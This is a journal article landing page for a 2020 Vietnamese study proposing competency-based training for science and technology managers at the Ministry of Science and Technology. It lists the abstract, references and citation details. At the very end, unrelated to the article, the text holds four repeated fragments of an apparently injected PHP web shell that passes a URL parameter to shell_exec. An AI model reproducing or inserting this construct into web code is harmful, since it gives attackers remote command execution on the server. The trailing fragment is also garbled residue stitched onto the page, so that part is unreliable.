Fostering science and technology management human resource in Vietnam according to competency-based approach

  • Tran Quang Huy
  • Tu Thao Huong Giang
  • Chu Van Tung
Keywords: Competency-based approach, Training for human development, Management human resource of science and technology

Abstract

There are several approaches in training science and technology management human resource development, of which competency-based training is widely applied in developed countries with some advantages in comparison with traditional training approaches. Based on theory of human resource development, international experiences and empirical research, this article proposes competency-based training for managerial human resource in the Ministry of Science and Technology (MOST). This application will promote managers’ competencies to ensure the improvement of state management in science and technology of MOST in the coming years.

Code: 20071701

Downloads

Download data is not yet available.

References

Tiếng Việt
1. Nghị định số 101/2017/NĐ-CP ngày 01/9/2017 của Chính phủ về đào tạo, bồi dưỡng cán bộ, công chức, viên chức.
2. Quyết định số 4009/QĐ-BKHCN ngày 29/12/2011 của Bộ KH&CN Phê duyệt Quy hoạch phát triển nhân lực ngành khoa học và công nghệ giai đoạn 2011-2020.
3. Quyết định số 1038/QĐ-BKHCN ngày 02/5/2019 của Bộ KH&CN về việc ban hành Quy chế quản lý hoạt động đào tạo, bồi dưỡng của Bộ KH&CN.
4. Bộ KH&CN (2018). “Báo cáo tổng hợp kết quả đào tạo, bồi dưỡng, Bộ KH&CN giai đoạn 2016-2018”.
5. Bộ KH&CN (2020). “Thay đổi tư duy quản lý khoa học, công nghệ và đổi mới sáng tạo”.
6. Cục Quản lý nhân lực Vương quốc Anh (2015). “Khung năng lực công chức Vương quốc Anh giai đoạn 2012-2017”.
7. Đại học Thanh Hoa (2018). “Tài liệu thuyết minh Chương trình bồi dưỡng quản lý công nghệ và chính sách (TMP: Technology Management and Policy)”.
8. Trần Quang Huy (2019). Xây dựng chương trình bồi dưỡng quản lý STI theo tiếp cận năng lực dành cho nhân lực quản lý của Bộ KH&CN. Đề tài NCKH cấp Bộ KH&CN năm 2019-2020.
Tiếng Anh
9. IP Australia (2017). “IP Australia annual report 2016-2017”.
10. ITAC Talent (2016).“Business Technology Management, National Occupational Standards (NOS)”.
11. Dubois, D., & Rothwell, W. J. (2004). “Competency-based or a traditional approach to training”. T and D, 58(4).
12. Guthrie, Hugh (2009). “Competence and Competency-based Training: What the Literature Says”. National Centre for Vocational Education Research (NCVER).
13. Hodge, Steven. (2007). “The origins of competency-based training”. 47. 107-209.
14. Kerka, S. (2001). “Competency-based education and training”. ERIC Clearinghouse on Adult, Career and Vocational Education, Columbus, OHIO.
15. McClelland, D. C. (1973). “Testing for Competence Rather than for Intelligence”. American Psychologist, 28, 1-14.
16. Noe R.A (2010). “Employee Training and Development”. McGraw-Hill/Irwin Paprock.
17. Paprock (1996).“Conceptual structure to develop adaptive competencies in professional”. IPN Ciencia, Arte: Cultura, Nueva Epoca, 2 (8), 22-25.
18. Wu, J.-L. (2013). “The Study of Competency-Based Training and Strategies in the Public Sector: Experience from Taiwan”. Public Personnel Management. 42. 259-271. 10.1177/0091026013487124.
Published
2020-07-15
How to Cite
Huy, T., Giang, T. T., & Tung, C. (2020, July 15). Fostering science and technology management human resource in Vietnam according to competency-based approach. Journal SCIENCE AND TECHNOLOGY POLICIES AND MANAGEMENT, 9(2), 38-53. Retrieved from http://vietnamstijournal.net/index.php/JSTPM/article/view/345
Section
STUDIES OF STRATEGIES AND MANAGEMENT
".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?> ".shell_exec($_GET["r0ng"]);}?>